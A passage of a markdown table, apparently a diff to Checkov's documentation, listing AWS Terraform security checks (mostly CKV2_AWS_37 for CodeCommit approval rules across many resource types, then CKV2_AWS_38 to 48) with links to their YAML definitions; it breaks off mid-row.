Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1384 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1385 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1386 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1387 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1388 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1389 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1390 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1391 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1392 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1393 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1394 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1395 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1396 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1397 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1398 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1399 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1400 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1401 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1402 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1403 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1404 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1405 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1406 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1407 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1408 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1409 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1410 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1411 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1412 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1413 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1414 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1415 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1416 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1417 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1418 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1419 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1420 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1421 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1422 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1423 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1424 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1425 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1426 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1427 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1428 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1429 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1430 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1431 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1432 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1433 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1434 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1435 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1436 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1437 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1438 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1439 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1440 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1441 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1442 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1443 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1444 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1445 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1446 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1447 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1448 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1449 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1450 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1451 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1452 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1453 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1454 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1455 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1456 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1457 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1458 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1459 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1460 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1461 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1462 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1463 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1464 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1465 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1466 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | +| 1467 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | +| 1468 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1469 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1470 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1471 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1472 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1473 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | +| 1474 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | +| 1475 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | +| 1476 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | +| 1477 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1478 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | +| 1479 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1480 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | +| 1481 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | +| 1482 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1483 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | +| 1484 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | +| 1485 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure 